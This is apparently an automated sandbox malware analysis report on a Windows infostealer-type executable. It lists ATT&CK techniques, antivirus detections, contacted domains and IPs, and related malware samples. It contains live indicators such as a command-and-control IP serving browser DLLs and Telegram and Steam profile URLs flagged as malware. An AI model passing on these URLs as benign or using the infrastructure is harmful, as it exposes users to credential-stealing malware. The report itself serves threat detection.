                      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                      Virtualization/Sandbox Evasion
                      DCSync1
                      Process Discovery
                      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job511
                      Process Injection
                      Proc Filesystem1
                      Remote System Discovery
                      Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      82xul16VKj.exe40%VirustotalBrowse
                      82xul16VKj.exe100%AviraHEUR/AGEN.1330215
                      82xul16VKj.exe100%Joe Sandbox ML
                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\sqlt[1].dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\kat2B07.tmp4%ReversingLabs
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      bg.microsoft.map.fastly.net0%VirustotalBrowse
                      tea.arpdabl.org2%VirustotalBrowse
                      edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com0%VirustotalBrowse
                      survey-smiles.com8%VirustotalBrowse
                      t.me0%VirustotalBrowse
                      SourceDetectionScannerLabelLink
                      http://ocsp.entrust.net030%URL Reputationsafe
                      http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                      http://ocsp.entrust.net0D0%URL Reputationsafe
                      http://www.sqlite.org/copyright.html.0%URL Reputationsafe
                      http://crl.entrust.net/server1.crl00%URL Reputationsafe
                      https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                      https://secure.comodo.com/CPS00%URL Reputationsafe
                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
                      http://crl.entrust.net/2048ca.crl00%URL Reputationsafe
                      https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dwmf%2B5.1%26oq%3Dwmf0%Avira URL Cloudsafe
                      https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
                      https://steamcommunity.com/profiles/76561199730044335100%Avira URL Cloudmalware
                      https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
                      https://116.202.180.70:5432/0%Avira URL Cloudsafe
                      https://116.202.180.70:5432/0%VirustotalBrowse
                      https://steamcommunity.com/profiles/765611997300443350%VirustotalBrowse
                      http://survey-smiles.com/R12%VirustotalBrowse
                      https://116.202.180.70:5432/2r0%Avira URL Cloudsafe
                      http://survey-smiles.com/R0%Avira URL Cloudsafe
                      https://web.telegram.org0%VirustotalBrowse
                      https://web.telegram.org0%Avira URL Cloudsafe
                      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%Avira URL Cloudsafe
                      https://duckduckgo.com/ac/?q=0%VirustotalBrowse
                      https://duckduckgo.com/chrome_newtab0%VirustotalBrowse
                      https://t.me/bu77un100%Avira URL Cloudmalware
                      https://116.202.180.70:5432/softokn3.dll%0%Avira URL Cloudsafe
                      https://www.google.com0%Avira URL Cloudsafe
                      https://116.202.180.70:5432/msvcp140.dll0%Avira URL Cloudsafe
                      http://tea.arpdabl.orgHJK0%Avira URL Cloudsafe
                      https://www.google.com/search?q=wmf0%Avira URL Cloudsafe
                      https://t.me/bu77un0%VirustotalBrowse
                      http://survey-smiles.com/0%Avira URL Cloudsafe
                      https://www.google.com0%VirustotalBrowse
                      http://tea.arpdabl.org5432Content-Disposition:0%Avira URL Cloudsafe
                      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%VirustotalBrowse
                      https://steamcommunity.com/profiles/76561199730044335hellosqlt.dllsqlite3.dll0%Avira URL Cloudsafe
                      http://tea.arpdabl.org/0%Avira URL Cloudsafe
                      http://survey-smiles.com/z0%Avira URL Cloudsafe
                      http://tea.arpdabl.org/v0%Avira URL Cloudsafe
                      http://survey-smiles.com/8%VirustotalBrowse
                      https://116.202.180.70/I0%Avira URL Cloudsafe
                      https://www.google.com/search?q=test&oq=test&aqs=chrome..69i57j46j0l3j46j0.427j0j7&sourceid=chrome&i0%Avira URL Cloudsafe
                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
                      https://steamcommunity.com/profiles/76561199730044335hellosqlt.dllsqlite3.dll0%VirustotalBrowse
                      http://rpi.net.au/~ajohnson/resourcehacker0%Avira URL Cloudsafe
                      https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search0%Avira URL Cloudsafe
                      http://tea.arpdabl.org/2%VirustotalBrowse
                      http://rpi.net.au/~ajohnson/resourcehacker0%VirustotalBrowse
                      http://survey-smiles.com/z10%VirustotalBrowse
                      https://116.202.180.70:54320%Avira URL Cloudsafe
                      https://www.google.com/favicon.ico0%Avira URL Cloudsafe
                      https://116.202.180.70/20%Avira URL Cloudsafe
                      http://tea.arpdabl.org/v1%VirustotalBrowse
                      https://116.202.180.70:54320%VirustotalBrowse
                      https://116.202.180.70:5432/vcruntime140.dll0%Avira URL Cloudsafe
                      http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%Avira URL Cloudsafe
                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%VirustotalBrowse
                      https://116.202.180.70:5432/freebl3.dll0%Avira URL Cloudsafe
                      https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search0%VirustotalBrowse
                      https://t.me/bu77unguf_hMozilla/5.00%Avira URL Cloudsafe
                      https://www.google.com/favicon.ico0%VirustotalBrowse
                      https://www.google.com/sorry/index0%Avira URL Cloudsafe
                      http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%VirustotalBrowse
                      http://tea.arpdabl.org/)0%Avira URL Cloudsafe
                      https://116.202.180.70:5432/softokn3.dllP0%Avira URL Cloudsafe
                      http://tea.arpdabl.org0%Avira URL Cloudsafe
                      https://t.me/bu77unguf_hMozilla/5.00%VirustotalBrowse
                      https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dtest%26oq%3Dtest%26a0%Avira URL Cloudsafe
                      https://116.202.180.70:5432Content-Disposition:0%Avira URL Cloudsafe
                      https://www.google.com/search?q=net0%Avira URL Cloudsafe
                      https://www.google.com/sorry/index0%VirustotalBrowse
                      https://www.google.com/sorry/indextest0%Avira URL Cloudsafe
                      https://116.202.180.70:5432/sqlt.dll0%Avira URL Cloudsafe
                      https://116.202.180.70:5432/mozglue.dll0%Avira URL Cloudsafe
                      https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%Avira URL Cloudsafe
                      http://tea.arpdabl.org2%VirustotalBrowse
                      https://116.202.180.70:5432/nss3.dll0%Avira URL Cloudsafe
                      NameIPActiveMaliciousAntivirus DetectionReputation
                      bg.microsoft.map.fastly.net
                      199.232.214.172
                      truefalseunknown
                      tea.arpdabl.org
                      185.107.56.202
                      truefalseunknown
                      edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com
                      217.20.58.23
                      truefalseunknown
                      survey-smiles.com
                      199.59.243.226
                      truefalseunknown
                      t.me
                      149.154.167.99
                      truetrueunknown
                      NameMaliciousAntivirus DetectionReputation
                      https://steamcommunity.com/profiles/76561199730044335true
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: malware
                      unknown
                      https://t.me/bu77untrue
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: malware
                      unknown
                      http://survey-smiles.com/true
                      • 8%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      http://tea.arpdabl.org/false
                      • 2%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      https://duckduckgo.com/chrome_newtabBAEBGC.2.drfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      https://116.202.180.70:5432/kat2B07.tmp, 00000002.00000003.369794652.00000000008E6000.00000004.00000020.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000003.383481823.00000000009C9000.00000004.00000020.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000003.371917226.00000000008ED000.00000004.00000020.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      https://duckduckgo.com/ac/?q=BAEBGC.2.drfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dwmf%2B5.1%26oq%3DwmfBGDGHJ.2.drfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://survey-smiles.com/Rkat2B07.tmp, 00000002.00000002.425497863.00000000009B1000.00000004.00000020.00020000.00000000.sdmptrue
                      • 12%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      https://116.202.180.70:5432/2rkat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://web.telegram.orgkat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      http://ocsp.entrust.net03kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      http://www.diginotar.nl/cps/pkioverheid0kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://116.202.180.70:5432/softokn3.dll%kat2B07.tmp, 00000002.00000002.425497863.00000000008E9000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://www.google.comkat2B07.tmp, 00000002.00000002.425312567.00000000005C8000.00000040.00000400.00020000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      https://116.202.180.70:5432/msvcp140.dllkat2B07.tmp, 00000002.00000002.425497863.00000000008E9000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://tea.arpdabl.orgHJKkat2B07.tmp, 00000002.00000002.425312567.0000000000439000.00000040.00000400.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://www.google.com/search?q=wmfBGDGHJ.2.drfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://tea.arpdabl.org5432Content-Disposition:kat2B07.tmp, 00000002.00000002.425312567.000000000043F000.00000040.00000400.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://steamcommunity.com/profiles/76561199730044335hellosqlt.dllsqlite3.dll82xul16VKj.exe, 00000000.00000002.342560030.0000000003080000.00000004.00000800.00020000.00000000.sdmp, 82xul16VKj.exe, 00000000.00000002.342253005.00000000002A0000.00000040.00001000.00020000.00000000.sdmp, 82xul16VKj.exe, 00000000.00000002.342512838.0000000002DE0000.00000040.00001000.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000002.425312567.0000000000425000.00000040.00000400.00020000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      http://survey-smiles.com/zkat2B07.tmp, 00000002.00000002.425497863.00000000009B1000.00000004.00000020.00020000.00000000.sdmptrue
                      • 10%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      http://ocsp.entrust.net0Dkat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://tea.arpdabl.org/vkat2B07.tmp, 00000002.00000002.425497863.00000000008C4000.00000004.00000020.00020000.00000000.sdmpfalse
                      • 1%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      http://www.sqlite.org/copyright.html.kat2B07.tmp, 00000002.00000002.428053868.000000002974E000.00000004.00000020.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmp, sqlt[1].dll.2.drfalse
                      • URL Reputation: safe
                      unknown
                      https://116.202.180.70/Ikat2B07.tmp, 00000002.00000002.425497863.00000000008C4000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://crl.entrust.net/server1.crl0kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://www.google.com/search?q=test&oq=test&aqs=chrome..69i57j46j0l3j46j0.427j0j7&sourceid=chrome&iBGDGHJ.2.drfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=BAEBGC.2.drfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      http://rpi.net.au/~ajohnson/resourcehacker82xul16VKj.exe, 00000000.00000002.342512838.0000000002DE0000.00000040.00001000.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000000.341903981.00000000004B4000.00000002.00000001.01000000.00000004.sdmp, kat2B07.tmp.0.drfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchBAEBGC.2.drfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      https://116.202.180.70:5432kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000002.425312567.00000000005C8000.00000040.00000400.00020000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      https://www.google.com/favicon.icoBAEBGC.2.drfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      https://116.202.180.70/2kat2B07.tmp, 00000002.00000002.425497863.00000000008C4000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://116.202.180.70:5432/vcruntime140.dllkat2B07.tmp, 00000002.00000002.425497863.00000000008F8000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://ac.ecosia.org/autocomplete?q=BAEBGC.2.drfalse
                      • URL Reputation: safe
                      unknown
                      http://crl.pkioverheid.nl/DomOvLatestCRL.crl0kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      https://116.202.180.70:5432/freebl3.dllkat2B07.tmp, 00000002.00000002.425497863.00000000008E9000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://t.me/bu77unguf_hMozilla/5.082xul16VKj.exe, 00000000.00000002.342560030.0000000003080000.00000004.00000800.00020000.00000000.sdmp, 82xul16VKj.exe, 00000000.00000002.342253005.00000000002A0000.00000040.00001000.00020000.00000000.sdmp, 82xul16VKj.exe, 00000000.00000002.342512838.0000000002DE0000.00000040.00001000.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000002.425312567.0000000000425000.00000040.00000400.00020000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      https://www.google.com/sorry/indexkat2B07.tmp, 00000002.00000003.383481823.00000000009C9000.00000004.00000020.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000002.425244038.000000000026F000.00000004.00000020.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000002.425312567.00000000005C8000.00000040.00000400.00020000.00000000.sdmp, BGDGHJ.2.drfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      http://tea.arpdabl.org/)kat2B07.tmp, 00000002.00000002.425497863.00000000008C4000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://116.202.180.70:5432/softokn3.dllPkat2B07.tmp, 00000002.00000002.425497863.00000000008E9000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://tea.arpdabl.orgkat2B07.tmp, 00000002.00000002.425312567.0000000000439000.00000040.00000400.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000002.425312567.000000000043F000.00000040.00000400.00020000.00000000.sdmpfalse
                      • 2%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dtest%26oq%3Dtest%26aBGDGHJ.2.drfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://116.202.180.70:5432Content-Disposition:kat2B07.tmp, 00000002.00000002.425312567.00000000005C8000.00000040.00000400.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://www.google.com/search?q=netBGDGHJ.2.drfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://www.google.com/sorry/indextestkat2B07.tmp, 00000002.00000003.383481823.00000000009B3000.00000004.00000020.00020000.00000000.sdmp, BGDGHJ.2.drfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://116.202.180.70:5432/sqlt.dllkat2B07.tmp, 00000002.00000003.371917226.00000000008E9000.00000004.00000020.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000002.425497863.00000000008E9000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://secure.comodo.com/CPS0kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://116.202.180.70:5432/mozglue.dllkat2B07.tmp, 00000002.00000002.425497863.00000000008E9000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=BAEBGC.2.drfalse
                      • URL Reputation: safe
                      unknown
                      http://crl.entrust.net/2048ca.crl0kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=BAEBGC.2.drfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://116.202.180.70:5432/nss3.dllkat2B07.tmp, 00000002.00000002.425497863.00000000008E9000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs
                      IPDomainCountryFlagASNASN NameMalicious
                      185.107.56.202
                      tea.arpdabl.orgNetherlands
                      43350NFORCENLfalse
                      116.202.180.70
                      unknownGermany
                      24940HETZNER-ASDEfalse
                      199.59.243.226
                      survey-smiles.comUnited States
                      395082BODIS-NJUSfalse
                      149.154.167.99
                      t.meUnited Kingdom
                      62041TELEGRAMRUtrue
                      Joe Sandbox version:40.0.0 Tourmaline
                      Analysis ID:1466531
                      Start date and time:2024-07-03 02:21:27 +02:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 5m 59s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                      Number of analysed new started processes analysed:9
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:82xul16VKj.exe
                      renamed because original name is a hash value
                      Original Sample Name:07b71144db1788265d841a6e5c6c719e0010fd8de93279510be7431556a8f957.exe
                      Detection:MAL
                      Classification:mal100.troj.spyw.evad.winEXE@7/14@4/4
                      EGA Information:
                      • Successful, ratio: 100%
                      HCA Information:
                      • Successful, ratio: 72%
                      • Number of executed functions: 11
                      • Number of non-executed functions: 227
                      Cookbook Comments:
                      • Found application associated with file extension: .exe
                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
                      • Excluded IPs from analysis (whitelisted): 217.20.58.23
                      • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      TimeTypeDescription
                      20:22:17API Interceptor322x Sleep call for process: kat2B07.tmp modified
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      199.59.243.226rPRESUPUESTO.exeGet hashmaliciousFormBookBrowse
                      • www.mommysdaycare.net/k4dg/
                      1R50C5E13BU8I.exeGet hashmaliciousFormBookBrowse
                      • www.42bomclub.com/zq0e/
                      AWB 112-17259653.exeGet hashmaliciousFormBookBrowse
                      • www.window-replace5.top/dihh/
                      eiqj38BeRo.rtfGet hashmaliciousFormBookBrowse
                      • www.home-repair-contractors-kfm.xyz/btrd/?OR-TJfQ=eVMlJIJ+geaZUobAArdtG7xbZNorDbW6x7q4JZ9YU9WFmkuuB+jImMamgZk5Kk8mIb1RaQ==&2dc=kvXd-rKHCF
                      mEESdHRhbB.exeGet hashmaliciousFormBookBrowse
                      • www.42bomclub.com/zq0e/
                      SWU5109523I.exeGet hashmaliciousFormBook, LokibotBrowse
                      • www.42bomclub.com/zq0e/
                      Invoice_Payment.exeGet hashmaliciousFormBookBrowse
                      • www.mommysdaycare.net/k4dg/
                      http://visit.keznews.comGet hashmaliciousUnknownBrowse
                      • ww82.keznews.com/favicon.ico
                      Custom_Inv_5634756433.exeGet hashmaliciousFormBookBrowse
                      • www.swordshoop.ca/b1td/
                      http://cns.archiq.netGet hashmaliciousUnknownBrowse
                      • cns.archiq.net/_tr
                      149.154.167.99http://telegramtw1.org/Get hashmaliciousUnknownBrowse
                      • telegram.org/?setln=pl
                      http://makkko.kz/Get hashmaliciousUnknownBrowse
                      • telegram.org/
                      http://telegram.dogGet hashmaliciousUnknownBrowse
                      • telegram.dog/
                      LnSNtO8JIa.exeGet hashmaliciousCinoshi StealerBrowse
                      • t.me/cinoshibot
                      jtfCFDmLdX.exeGet hashmaliciousGurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRATBrowse
                      • t.me/cinoshibot
                      vSlVoTPrmP.exeGet hashmaliciousGurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRATBrowse
                      • t.me/cinoshibot
                      RO67OsrIWi.exeGet hashmaliciousGurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRATBrowse
                      • t.me/cinoshibot
                      KeyboardRGB.exeGet hashmaliciousUnknownBrowse
                      • t.me/cinoshibot
                      file.exeGet hashmaliciousCinoshi StealerBrowse
                      • t.me/cinoshibot
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      t.mefile.exeGet hashmaliciousVidarBrowse
                      • 149.154.167.99
                      file.exeGet hashmaliciousPureLog Stealer, VidarBrowse
                      • 149.154.167.99
                      pDHKarOK2v.exeGet hashmaliciousCryptOne, VidarBrowse
                      • 149.154.167.99
                      1719859269.0326595_setup.exeGet hashmaliciousLummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, XmrigBrowse
                      • 149.154.167.99
                      https://clicktime.cloud.postoffice.net/clicktime.php?U=https%3A%2F%2Ftelegra.ph%2FDavis-Insurance-Agency-LLC-06-28&E=kgarber%40woodlandsbank.com&X=XID311CFbwQP1837Xd1&T=WDLP&HV=U,E,X,T&H=3a14786ee7a8dd2b0305ef5dd961d4108cbfaf34Get hashmaliciousUnknownBrowse
                      • 149.154.167.99
                      zyJWi2vy29.exeGet hashmaliciousLummaC, PureLog Stealer, RisePro Stealer, Vidar, zgRATBrowse
                      • 149.154.167.99
                      56bDgH9sMQ.exeGet hashmaliciousVidarBrowse
                      • 149.154.167.99
                      tea.arpdabl.org1719859269.0326595_setup.exeGet hashmaliciousLummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, XmrigBrowse
                      • 207.180.253.128
                      1719520929.094843_setup.exeGet hashmaliciousLummaC Stealer, Mars Stealer, PrivateLoader, PureLog Stealer, Socks5Systemz, Stealc, VidarBrowse
                      • 207.180.253.128
                      edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comhttps://cottonaust-my.sharepoint.com/:o:/g/personal/alik_cotton_org_au/EuLPuwXgoYRMiEqYXs3_rLwB-wXPnDQH36qdcfGJf36wfQ?e=5%3a5iMFOj&at=9&xsdata=MDV8MDJ8anJvc2luZ0Bzbi5jb20uYXV8ZTM1ZDk4Mjc1MTRkNDBhYTMzNTEwOGRjOWFlNzVjZmJ8YzliYTVmZjE1MGZiNDQzYWFhNTFmOGE5NzllNmU2ZDF8MHwwfDYzODU1NTU2NTcxOTU0MzY0NHxVbmtub3dufFRXRnBiR1pzYjNkOGV5SldJam9pTUM0d0xqQXdNREFpTENKUUlqb2lWMmx1TXpJaUxDSkJUaUk2SWsxaGFXd2lMQ0pYVkNJNk1uMD18MHx8fA%3d%3d&sdata=MFc3WHlZbDlQVVZ4dEtjOENETThRcWo2M2JHdzVDVElrYjVkVDdERHZGYz0%3dGet hashmaliciousHTMLPhisherBrowse
                      • 217.20.57.34
                      http://business.ifbsmetaiidentiityconfirms.com/meta-community-standard100068928266341/Get hashmaliciousUnknownBrowse
                      • 217.20.57.18
                      http://services.business-manange.com/Get hashmaliciousUnknownBrowse
                      • 217.20.57.18
                      https://pub-9445ce0d74714d1c934c51ffcf83c3f2.r2.dev/slnt.html?nycsbsGet hashmaliciousHTMLPhisherBrowse
                      • 217.20.57.34
                      http://www.anuihafw369.xyz/m/register/Get hashmaliciousUnknownBrowse
                      • 217.20.57.34
                      http://scamwebsite.com/Get hashmaliciousUnknownBrowse
                      • 217.20.57.34
                      https://glamis-house.com/?email=Get hashmaliciousHTMLPhisherBrowse
                      • 217.20.57.27
                      Tas8.dllGet hashmaliciousBlackMoonBrowse
                      • 217.20.57.34
                      zm.dllGet hashmaliciousBlackMoonBrowse
                      • 217.20.57.20
                      call_Playback_worthingtonindustries.com.htmlGet hashmaliciousHTMLPhisherBrowse
                      • 217.20.57.41
                      survey-smiles.comsample.docGet hashmaliciousUnknownBrowse
                      • 199.59.243.225
                      http://survey-smiles.comGet hashmaliciousUnknownBrowse
                      • 199.59.243.225
                      PAYMENT-FILE-G9609523.docGet hashmaliciousUnknownBrowse
                      • 199.59.243.225
                      http://216.245.214.84Get hashmaliciousUnknownBrowse
                      • 199.59.243.224
                      http://216.245.214.84Get hashmaliciousUnknownBrowse
                      • 199.59.243.224
                      http://survey-smiles.comGet hashmaliciousUnknownBrowse
                      • 199.59.243.223
                      http://survey-smiles.com/Get hashmaliciousUnknownBrowse
                      • 199.59.243.223
                      D7C08A686196D6C28D4F79588AEC7A0CA0123E35C57A9.exeGet hashmaliciousVidarBrowse
                      • 199.59.243.223
                      bg.microsoft.map.fastly.nethttps://rules-pear-kft5d2.mystrikingly.com/Get hashmaliciousUnknownBrowse
                      • 199.232.214.172
                      http://sp.26skins.com/steamstore/category/adventure_rpg/?snr=1_5_9__12Get hashmaliciousUnknownBrowse
                      • 199.232.210.172
                      0cjB1Kh8zU.msiGet hashmaliciousUnknownBrowse
                      • 199.232.214.172
                      http://pub-2e7429ed1f544f43a4684eeceb978dbb.r2.dev/home.htmlGet hashmaliciousUnknownBrowse
                      • 199.232.210.172
                      https://pub-1b634168cd404e2d8bece63d5ebb4798.r2.dev/uint.html?schweissdoorsGet hashmaliciousHTMLPhisherBrowse
                      • 199.232.210.172
                      http://helpdesk-advertising-review-id-9865133.d3m7n55z273utf.amplifyapp.com/index.htmlGet hashmaliciousUnknownBrowse
                      • 199.232.214.172
                      https://delivery.attempt.failure.ebbs.co.za/public/MY096OineFzTCVJ56qDw3aMDByE0CDQ1Get hashmaliciousUnknownBrowse
                      • 199.232.214.172
                      https://mail.support-xfinity.152-42-227-61.cprapid.com/Billing-Online.html?Review-VerificationMyAccountGet hashmaliciousUnknownBrowse
                      • 199.232.210.172
                      http://www.telegramkv.com/Get hashmaliciousUnknownBrowse
                      • 199.232.210.172
                      https://request-remove-violation-here.surge.sh/next.htmlGet hashmaliciousUnknownBrowse
                      • 199.232.210.172
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
